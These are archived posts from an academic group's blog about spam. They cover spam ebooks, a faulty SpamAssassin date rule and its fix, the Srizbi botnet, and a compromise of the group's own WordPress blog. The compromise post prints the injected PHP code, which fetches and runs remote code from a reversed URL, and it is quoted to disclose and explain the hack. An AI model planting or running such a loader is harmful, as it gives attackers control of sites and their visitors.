April 6th, 2011
Publishing trends has a good post describing a new variation on spam: creating low-quality ebooks from plagiarized or public-domain content and selling them in ebook markets like Amazon’s Kindle store. If you want to MAKE.MONEY.FAST there are people willing to help:
Automatically detecting these spam ebooks might be a good machine learning project. One problem is that to use features of the ebook itself (e.g., poor formatting) might require purchasing it. But there are sure to be many useful features that the ebook store provides that might support an effective classifier.
(h/t Bruce Schneier)
January 1st, 2010
Shades of Y2K! Mike Cardwell reports on a rule in Spamassassin that judges any message sent in or after 2010 as “grossly in the future” and treats this as evidence of it being spam. I just checked and found that our mail server’s Spamassassin is using this buggy FH_DATE_PAST_20XX rule.
If you are using Spamassassin, or think your mail server might be, check the source of mail you have received today. Here’s an example from one of my messages this morning.
X-Spam-Checker-Version: SpamAssassin 3.2.5 ... on mail.cs.umbc.edu
X-Spam-Status: No, score=1.6 required=5.0 tests=AWL,FH_DATE_PAST_20XX
Received: from mail-yw0-f142.google.com (mail-yw0-f142.google.com
[220.127.116.11]) by mail.cs.umbc.edu (8.14.3/8.14.3) with ESMTP
id o01DjJUn011187; Fri, 1 Jan 2010 08:45:19 -0500 (EST)
If the message exceeds the local spam score threshold for, you may find a block with more details in your message header, like this example.
Content analysis details: (6.1 points, 5.0 required)
pts rule name description
---- ---------------------- ----------------------------------
3.4 FH_DATE_PAST_20XX The date is grossly in the future.
-4.0 RCVD_IN_DNSWL_MED RBL: Sender listed at http://www.dnswl.org/,
medium trust [18.104.22.168 listed in list.dnswl.org]
1.8 SUBJ_ALL_CAPS Subject is all capitals
0.7 MSOE_MID_WRONG_CASE MSOE_MID_WRONG_CASE
4.2 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
As a workaround until your server updates Spamassassin, the points that the rule adds to a message’s spam score can be lowered to 0.0 in Spamassassin’s configuration file (local.cf) or your own user-prefs file.
score FH_DATE_PAST_20XX 0.0
May 21st, 2009
Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.
< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>
This code caused URLs like https://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:
- adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
- viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu
I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.
The results of this Google search reveal many compromised blogs from the .edu domain.
November 30th, 2008
Just like Freddy Kreuger, botnets are hard to kill.
In a series of posts on his Security Fix blog, Brian Krebs provides a good explanation of how the Srizbi botnet was able to come back to life after being killed (we thought!) earlier this month.
“The botnet Srizbi was knocked offline Nov. 11 along with Web-hosting firm McColo, which Internet security experts say hosted machines that controlled the flow of 75 percent of the world’s spam. One security firm, FireEye, thought it had found a way to prevent the botnet from coming back online by registering domain names it thought Srizbi was likely to target. But when that approach became too costly for the firm, they had to abandon their efforts.”
In a example of good distributed programming design, the botnet had a backup plan if its control servers were taken down.
“The malware contained a mathematical algorithm that generates a random but unique Web site domain name that the bots would be instructed to check for new instructions and software updates from its authors. Shortly after McColo was taken offline, researchers at FireEye said they deciphered the instructions that told computers infected with Srizbi which domains to seek out. FireEye researchers thought this presented a unique opportunity: If they could figure out what those rescue domains would be going forward, anyone could register or otherwise set aside those domains to prevent the Srizbi authors from regaining control over their massive herd of infected machines.”
Unfortunately, FireEye did not have the resources to carry out its plan and was forced to abandon it, but not before seeking help from other companies and organizations with deeper pockets.
“A week ago, FireEye researcher Lanstein said they were looking for someone else to register the domain names that the Srizbi bots might try to contact to revive themselves. He said they approached other companies such as VeriSign Inc. and Microsoft Corp. After FireEye abandoned its efforts, some other members of the computer security community said they reached out for help from the United States Computer Emergency Readiness Team, or US-CERT, a partnership between the Department of Homeland Security and the private sector to combat cypersecurity threats.
File this one under opportunity, lost.